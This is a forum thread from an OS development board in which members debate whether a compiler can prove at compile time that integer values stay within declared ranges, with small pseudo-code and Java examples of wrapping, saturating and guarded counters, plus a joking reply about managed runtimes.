My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 8:53 am
Author: Brendan (Member; Joined: Sat Jan 15, 2005 12:00 am; Posts: 8561; Location: At his keyboard!)

Hi,

Schol-R-LEA wrote:
WRT one specific assertion mentioned earlier - that overflows can always be statically checked - I want to present a use case and see how you would propose to handle it, as it should help clarify what we mean by the term 'runtime bounds checking'.

Let us consider a case where an application program is simply incrementing a value that needs to be within a given range - say, 0 to 999 (the bounds are arbitrary, and I deliberately chose one not on a bit boundary; also, this need not reflect the effective values - for example, the 'real' values may be -250..749, with an offset of -250). Let us assume, for practicality's sake, a conventional byte-oriented architecture (that is to say, the operational unit of memory is an eight-bit value). In this instance, the upper bound is too large to fit within a single byte, so we will need a two-byte value to hold our counter - we can assume that the two bytes are a contiguous pair in whatever byte order the hardware uses, though if there are solutions which involve separating the value into individual bytes, I'd be willing to consider them.

If we are simply incrementing the value using the increment or addition primitive, with no runtime check on the size of the value, then when the value is 999 prior to the increment, it will go to 1000, which exceeds the range of values we seek to use. In this instance, while there is no physical overflow of the value, it has exceeded the acceptable range of values. Thus, it seems to me that we will need to check the current value either prior to or immediately following the increment, regardless of how the increment is defined at a higher level of abstraction. Do you consider this to be a run-time bounds check, and if so, how would you eliminate the test?


For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.

The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....

If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
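
In Java-flavored code (my sketch; Java has no ranged integer types, so a MAX constant stands in for x.max), those programmer-chosen fixes look like:

Code:
    class BoundedCounter {
        static final int MAX = 999;                                  // stand-in for x.max

        static int wrap(int x)     { return (x + 1) % (MAX + 1); }   // wrapping: 999 -> 0
        static int saturate(int x) { return Math.min(x + 1, MAX); }  // saturation: stays at 999

        static int checked(int x) {                                  // explicit guard, written by
            if (x >= MAX) {                                          // the programmer, not inserted
                throw new IllegalStateException("counter full");     // by the compiler
            }
            return x + 1;
        }
    }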

Schol-R-LEA wrote:
Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.


The context only really affects what the compiler thinks the previous range of values in x could be. For example:

Code:
    x = 0                    ;Value in x ranges from 0 to 0 here
    if(y > 123) {
        x = 9                ;Value in x ranges from 9 to 9 here
    }
                             ;Value in x ranges from 0 to 9 here
    x = x + 1
                             ;Value in x ranges from 1 to 10 here


There are cases where the compiler simply isn't smart enough to track the range of variables properly and has to make assumptions. These assumptions can lead to "false negatives". For example:

Code:
    x = 1
                             ;Value in x ranges from 1 to 1 here
    while( x % 33 != 0) {
                             ;Compiler can't figure out the true range of x here but can
                             ;  assume x must range from 0 to 999 due to the variable's type
        x = x + 1            ;ERROR (potential overflow)
    }


Of course, by improving the compiler and making it smarter you get fewer false negatives. For that specific example, the compiler could (e.g.) interpret/execute the loop at compile time to prove that the "x = x + 1" is perfectly safe.

Basically it comes down to a design choice. A compiler may:
  • guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
  • guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time

The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.

The second option is what most (all?) existing compilers do. This is less annoying for programmers when they're writing code; but extremely frustrating for programmers afterwards when they have to deal with bug reports despite the fact that they've spent ages writing 5 times as many unit tests. ;)


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 9:45 am
Author: Combuster (Member; Joined: Wed Oct 18, 2006 3:45 am; Posts: 9301; Location: On the balcony, where I can actually keep 1½m distance)

embryo2 wrote:
A managed environment employs a number of techniques to control the software it runs. That is, the environment manages the code. The forms of management are many, and they differ from one another. The overall result of the techniques employed is cost, speed, and quality enhancement.
Good. I'll just add -O2 -Werror to GCC and run it in a VM. Wow, it's suddenly managed! :mrgreen:
Quote:
speed (...) enhancement
Java managed? Now that's the silliest thing I've heard in months :mrgreen:


Ahem.

I cast Hideous Laughter on myself and fail the saving roll.

_________________
"Certainly avoid yourself. He is a newbie and might not realize it. You'll hate his code deeply a few years down the road." - Sortie
[ My OS ] [ VDisk/SFS ]

